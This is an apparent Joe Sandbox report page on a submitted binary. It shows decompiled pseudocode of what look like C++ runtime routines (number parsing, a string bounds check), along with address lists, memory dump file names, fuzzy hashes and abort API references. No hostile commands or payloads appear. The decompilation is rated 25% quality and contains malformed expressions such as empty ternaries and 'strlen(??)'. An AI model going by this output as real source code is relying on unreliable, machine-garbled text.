									__eflags =  *(_t240 + 8) -  *((intOrPtr*)(_t240 + 0xc));
									if( *(_t240 + 8) >=  *((intOrPtr*)(_t240 + 0xc))) {
										_v40 = _t270;
										_t189 =  *((intOrPtr*)( *_t240 + 0x24))();
										_t270 = _v40 & 0x000000ff;
										__eflags = _t189 - 0xffffffff;
										if(_t189 != 0xffffffff) {
											goto L31;
										} else {
											_a4 = 0;
										}
									} else {
										L31:
										_v32 = 0;
									}
									goto L7;
								}
							}
						}
					}
					L64:
				}
				L1:
				_v50 = _t236 == 0xffffffff;
				_t238 = (_t236 & 0xffffff00 | _t285 != 0x00000000) & _v50 & 0x000000ff;
				if(_t238 != 0) {
					__eflags =  *((intOrPtr*)(_t285 + 8)) -  *((intOrPtr*)(_t285 + 0xc));
					if( *((intOrPtr*)(_t285 + 8)) >=  *((intOrPtr*)(_t285 + 0xc))) {
						_v32 = _t269;
						_t180 =  *((intOrPtr*)( *_t285 + 0x24))();
						_t269 = _v32 & 0x000000ff;
						__eflags = _t180 - 0xffffffff;
						_t182 =  !=  ? _t285 : 0;
						_v56 =  !=  ? _t285 : 0;
						_t183 = 0;
						_t239 =  !=  ? 0 : _t238;
					} else {
						_t239 = 0;
					}
				} else {
					_t239 = _v50 & 0x000000ff;
				}
				if(_t239 != _t269) {
					_v32 = E013EE520( &_a4);
					_t278 = _a28 + _a28;
					__eflags = _t278;
					if(_t278 == 0) {
						_t183 = _a8;
						_t240 = _a4;
						_v60 = 0;
						_t286 = 0;
						_v36 = _t183;
						goto L5;
					} else {
						_v36 = _t278;
						_t251 = 0;
						_t282 = _a24;
						_t287 = 0;
						while(1) {
							L43:
							_t264 =  *((char*)( *((intOrPtr*)(_t282 + _t251 * 4))));
							__eflags = _t264 - _v32;
							if(_t264 == _v32) {
								break;
							}
							_t269 = _v40;
							 *_t290 = _t264;
							_t221 =  *((intOrPtr*)( *_t269 + 8))();
							_t290 = _t290 - 4;
							__eflags = _v32 - _t221;
							if(_v32 == _t221) {
								break;
							} else {
								_t251 = _t251 + 1;
								__eflags = _t251 - _v36;
								if(_t251 != _v36) {
									continue;
								}
							}
							L45:
							_t240 = _a4;
							__eflags = _t287;
							if(_t287 != 0) {
								E01456F10(_t240);
								_t267 = _t287 * 4;
								_a8 = 0xffffffff;
								_t228 = E013D6170(_t267 + 0x1b >> 4 << 4);
								_t269 = _v44;
								_t291 = _t290 - _t228;
								_v40 = _t240;
								_t252 = _a24;
								_v36 = _t287;
								_t230 =  &_v61 & 0xfffffff0;
								_v60 = _t230;
								_t232 = _t269 + _t267;
								__eflags = _t232;
								_t288 = _t230;
								_t284 = _t269;
								_v32 = _t232;
								do {
									_t233 =  *_t284;
									_t288 = _t288 + 4;
									_t284 =  &(_t284[1]);
									 *_t291 =  *((intOrPtr*)(_t252 + _t233 * 4));
									_t183 = strlen(??);
									 *(_t288 - 4) = _t183;
									__eflags = _v32 - _t284;
								} while (_v32 != _t284);
								_t286 = _v36;
								_t240 = _v40;
								_t278 = 1;
								_v36 = 0xffffffff;
							} else {
								_t183 = _a8;
								_v60 = 0;
								_t278 = 0;
								_v36 = _t183;
							}
							goto L5;
						}
						 *(_v44 + _t287 * 4) = _t251;
						_t251 = _t251 + 1;
						_t287 = _t287 + 1;
						__eflags = _t251 - _v36;
						if(_t251 != _v36) {
							goto L43;
						}
						goto L45;
					}
					goto L64;
				} else {
					_v60 = 0;
					_t240 = _a4;
					_t286 = 0;
					_t278 = 0;
				}
				goto L5;
			}

0x01423440
0x0142344c
0x0142344f
0x01423455
0x01423458
0x01423460
0x01423473
0x01423478
0x0142347b
0x01423484
0x01423487
0x0142348d
0x01423490
0x01423498
0x0142349a
0x014237a5
0x014237aa
0x014237ad
0x01423817
0x0142381a
0x0142381d
0x00000000
0x0142381f
0x0142381f
0x01423826
0x00000000
0x01423826
0x014237af
0x014237af
0x014237af
0x00000000
0x014237af
0x014234f2
0x014234fa
0x014234fd
0x01423600
0x01423606
0x01423609
0x014237ba
0x014237bd
0x014237c0
0x014237c4
0x014237cc
0x014237d0
0x014237d8
0x0142360f
0x0142360f
0x0142360f
0x01423503
0x01423503
0x01423503
0x0142350a
0x014235d8
0x014235d8
0x014235db
0x0142365c
0x0142365f
0x00000000
0x01423661
0x01423661
0x01423664
0x01423666
0x00000000
0x01423668
0x01423668
0x0142366b
0x00000000
0x00000000
0x00000000
0x00000000
0x0142366b
0x01423666
0x014235dd
0x014235e0
0x014235e2
0x01423671
0x01423674
0x0142367b
0x0142367e
0x01423684
0x01423693
0x00000000
0x00000000
0x00000000
0x014235e2
0x01423510
0x01423510
0x01423515
0x01423523
0x01423638
0x01423638
0x0142363b
0x0142363e
0x01423805
0x01423808
0x0142380b
0x01423847
0x0142384e
0x0142380d
0x0142380d
0x0142380d
0x01423644
0x01423647
0x01423647
0x0142363e
0x01423528
0x014235e8
0x014235e8
0x014235ee
0x014235ee
0x014235fb
0x0142352e
0x01423533
0x01423536
0x01423538
0x0142353b
0x0142353e
0x0142354b
0x0142354b
0x0142354b
0x0142354e
0x01423558
0x0142355c
0x00000000
0x00000000
0x01423561
0x01423568
0x01423578
0x014235d0
0x00000000
0x0142357a
0x0142357d
0x01423586
0x0142358e
0x01423592
0x00000000
0x00000000
0x01423592
0x00000000
0x01423578
0x01423540
0x01423544
0x01423544
0x01423547
0x01423547
0x01423547
0x01423594
0x01423597
0x0142359c
0x00000000
0x0142359e
0x0142359e
0x014235a1
0x014235a7
0x01423654
0x014235ad
0x014235ad
0x014235b0
0x014235b0
0x014235b3
0x014235ba
0x014235bd
0x014234d8
0x014234d8
0x014234dc
0x014234e4
0x014234e6
0x014234e9
0x00000000
0x014234ef
0x014234ef
0x014234ef
0x00000000
0x01423620
0x01423623
0x01423626
0x014237e2
0x014237e7
0x014237ea
0x014237ee
0x014237f1
0x00000000
0x014237f7
0x014237f7
0x014237f7
0x0142362c
0x0142362c
0x0142362c
0x0142362c
0x00000000
0x01423626
0x014234d8
0x0142359c
0x01423528
0x00000000
0x0142350a
0x014234a0
0x014234a3
0x014234b0
0x014234b2
0x01423795
0x01423798
0x01423859
0x0142385e
0x01423861
0x01423865
0x0142386d
0x01423870
0x01423873
0x01423878
0x0142379e
0x0142379e
0x0142379e
0x014234b8
0x014234b8
0x014234b8
0x014234be
0x014236a1
0x014236a4
0x014236a4
0x014236a6
0x01423830
0x01423833
0x01423836
0x0142383d
0x0142383f
0x00000000
0x014236ac
0x014236ac
0x014236af
0x014236b1
0x014236b4
0x014236df
0x014236df
0x014236e2
0x014236e5
0x014236e8
0x00000000
0x00000000
0x014236c0
0x014236c5
0x014236ca
0x014236cd
0x014236d0
0x014236d3
0x00000000
0x014236d5
0x014236d8
0x014236db
0x014236dd
0x00000000
0x00000000
0x014236dd
0x014236fd
0x014236fd
0x01423700
0x01423702
0x0142371a
0x0142371f
0x01423726
0x01423736
0x0142373b
0x0142373e
0x01423740
0x01423743
0x0142374a
0x0142374d
0x01423752
0x01423757
0x01423757
0x01423759
0x0142375b
0x0142375d
0x01423760
0x01423760
0x01423762
0x01423765
0x0142376b
0x0142376e
0x01423773
0x01423776
0x01423776
0x0142377b
0x0142377e
0x01423781
0x01423786
0x01423704
0x01423704
0x01423707
0x0142370e
0x01423710
0x01423710
0x00000000
0x01423702
0x014236ed
0x014236f3
0x014236f6
0x014236f9
0x014236fb
0x00000000
0x00000000
0x00000000
0x014236fb
0x00000000
0x014234c4
0x014234c4
0x014234cb
0x014234ce
0x014234d0
0x014234d0
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a18ed281027c4f3e37c296ad7063eaa0bc956d54bbe90078d222ae943ce2f9
Instruction ID: bd713b90c0defa4c21833191219edb1ba58a4dd70350e297e15e141bdf447468
Opcode Fuzzy Hash: e4a18ed281027c4f3e37c296ad7063eaa0bc956d54bbe90078d222ae943ce2f9
Instruction Fuzzy Hash: 42D13F75A042698FCF11CF68C4805EDBBF1BF4D324F948266E469AB3A1D339E985CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013EA0A0 Relevance: 1.3, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E013EA0A0(intOrPtr* __ecx, intOrPtr _a4) {
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _t6;
				void* _t9;
				intOrPtr* _t12;
				intOrPtr _t13;
				char* _t14;
				void* _t15;
				char** _t16;

				_t16 = _t15 - 0x1c;
				_t6 =  *__ecx;
				_t13 = _a4;
				_t12 =  *((intOrPtr*)(_t6 - 0xc));
				if(_t13 >= _t12) {
					_v20 = _t12;
					_v24 = _t13;
					 *_t16 = "basic_string::at: __n (which is %zu) >= this->size() (which is %zu)";
					E01473530(_t14, __eflags);
					_t9 =  *_t12 +  *((intOrPtr*)( *_t12 - 0xc));
					__eflags = _t9;
					return _t9;
				} else {
					return _t6 + _t13;
				}
			}

0x013ea0a0
0x013ea0a3
0x013ea0a5
0x013ea0a9
0x013ea0ae
0x013ea0b8
0x013ea0bc
0x013ea0c0
0x013ea0c7
0x013ea0d2
0x013ea0d2
0x013ea0d5
0x013ea0b0
0x013ea0b5
0x013ea0b5

Strings

basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 013EA0C0

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID: basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
API String ID: 0-3720052664
Opcode ID: 2421a7baabc0deac26b70cb1a829605ee90826964e1b128f93ca09b2fd8d01cb
Instruction ID: 8885fd5712ada8048f0a4cd16d602b7676096d2ba3c5a1dceacc4f14739151dd
Opcode Fuzzy Hash: 2421a7baabc0deac26b70cb1a829605ee90826964e1b128f93ca09b2fd8d01cb
Instruction Fuzzy Hash: 1BE0B6B1E056418FCB04EF18C585829F7F1BB95308F5499ADD08497330D235D814CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 014188C0 Relevance: .7, Instructions: 684COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a1d2162cc083f691e8dc29796b388a3285a0b1e035d4ab734f1ae165336fd0
Instruction ID: a345a3ff56ece681a103d9ed76281ead70f0c6843d4cba9a998c383e3a2b6581
Opcode Fuzzy Hash: 08a1d2162cc083f691e8dc29796b388a3285a0b1e035d4ab734f1ae165336fd0
Instruction Fuzzy Hash: B852CE74A0025ACBDF11CF68C1943EEBBB2BF09314F18855BE845AB3A9D334D986CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01417410 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1a8bee57597d5555ff19f913f2945ab86cbbf92e2c58fd48f68fbe02bad1c22
Instruction ID: 2e5fe97469ea130ec479f9f8029369e605d73cb8b36081d2093af690b72140f2
Opcode Fuzzy Hash: e1a8bee57597d5555ff19f913f2945ab86cbbf92e2c58fd48f68fbe02bad1c22
Instruction Fuzzy Hash: 5652CE75A00249CFDF11CF6CC0847AEBFB1AF09315F18855AE855AB3AAD334D986CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01417E70 Relevance: .7, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 372c5f9f900f4c67835a5debb97362e8994c9cca5f58ca015b3f05e45ad6d631
Instruction ID: c2d60a9508698703306a8d04adbeed6c6c7ee553e3e1d3c6959e8883147048ad
Opcode Fuzzy Hash: 372c5f9f900f4c67835a5debb97362e8994c9cca5f58ca015b3f05e45ad6d631
Instruction Fuzzy Hash: 6552CE74A0024ACFDF11CF68C5847EEBBB1BF05314F18825AE855AB3AAD335D886CB51

Uniqueness

Uniqueness Score: -1.00%

Function 014169C0 Relevance: .7, Instructions: 671COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bba0ebda9e03052557df4278e27e60a05009203f1a80b6403d94f4b696053b9
Instruction ID: d0d56cf61fe8905d7a5735aa85562bc0515259adac9e30b34627b0986bd43eaf
Opcode Fuzzy Hash: 1bba0ebda9e03052557df4278e27e60a05009203f1a80b6403d94f4b696053b9
Instruction Fuzzy Hash: 9752ED74A00259CFDF11CF6CC0847AEBBB1BF05314F59824AE845AB3A9D3B4D986CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013CDD90 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9137027740f6d67fd31d99ff46064f8ba52a75d9b98db7880fe59e0e9e25cc0e
Instruction ID: 1849d13b1287fcd287df591257b6ebcdb3c52aab39cf5fbc0b2ef11544c8cfb2
Opcode Fuzzy Hash: 9137027740f6d67fd31d99ff46064f8ba52a75d9b98db7880fe59e0e9e25cc0e
Instruction Fuzzy Hash: 54E1BDB1A046158FDB24CF19C494766BBE2AF45B08F49C4ADE98A4F646C339ED46CFC0

Uniqueness

Uniqueness Score: -1.00%

Function 0148116C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction ID: 7f61731d00d8ce01d5fbb7ce82ac9c1a7fe0c96581f3af1b4d1674daf0f00718
Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction Fuzzy Hash: 97E04F322205559FC722AE5AC844C9BF7E9EB98AB07454827ED6597731D230FC02C790

Uniqueness

Uniqueness Score: -1.00%

Function 013E5952 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e695c613f94072b84ef2d12610c8158de7455fe7e5b79ca7fd847a0466d425e
Instruction ID: 3e6e836a6395d2c354d286bf1d25ac67656e37ec406bd8fd41fe774fc80c29eb
Opcode Fuzzy Hash: 8e695c613f94072b84ef2d12610c8158de7455fe7e5b79ca7fd847a0466d425e
Instruction Fuzzy Hash: 0EC08CE2C02B0056E6007F28954A3B8B670E722200FC8699CC9A013312E23EC218A69E

Uniqueness

Uniqueness Score: -1.00%

Function 013E58E0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35a52c7c72c13d47b5938ffa595ee749395ed2ff8d64241627ed12cbc68d132c
Instruction ID: 2e4384176b593198b3ba666e864d6a428a95c4bd249ae39540c46b8ba7f0b7e7
Opcode Fuzzy Hash: 35a52c7c72c13d47b5938ffa595ee749395ed2ff8d64241627ed12cbc68d132c
Instruction Fuzzy Hash: 82C012B0C052418AD200BF389209228BAB0AB62200F8828ACD68413222E639C018865B

Uniqueness

Uniqueness Score: -1.00%

Function 013E5AB2 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ff7c5a45d2cc4139ef06e898cac6d528f7c2c3c6f8c1b2c8cf75e2af15aa1e6
Instruction ID: e997b14391c9ac7e8b12fc59b7098a04b13b6a1954259ee5cab092ed7288ce2c
Opcode Fuzzy Hash: 6ff7c5a45d2cc4139ef06e898cac6d528f7c2c3c6f8c1b2c8cf75e2af15aa1e6
Instruction Fuzzy Hash: DEB092AAC4560106D2407E39184A534B4306732012FE92DDC9C5423327F47AC674869B

Uniqueness

Uniqueness Score: -1.00%

Function 013D6A80 Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 335COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9F6
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147A9FB
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA00
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA05
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0A
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA0F
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA14
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Strings

@, xrefs: 013D6A61

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: 830e050444435e12d279c5208aa8cc4bf8fa0eed52ac3c36c31454d054cf032d
Instruction ID: 07c04bcbbb7b3f20bd0e4795596178819224c0ea35093a4f93d74f8df6c44d0d
Opcode Fuzzy Hash: 830e050444435e12d279c5208aa8cc4bf8fa0eed52ac3c36c31454d054cf032d
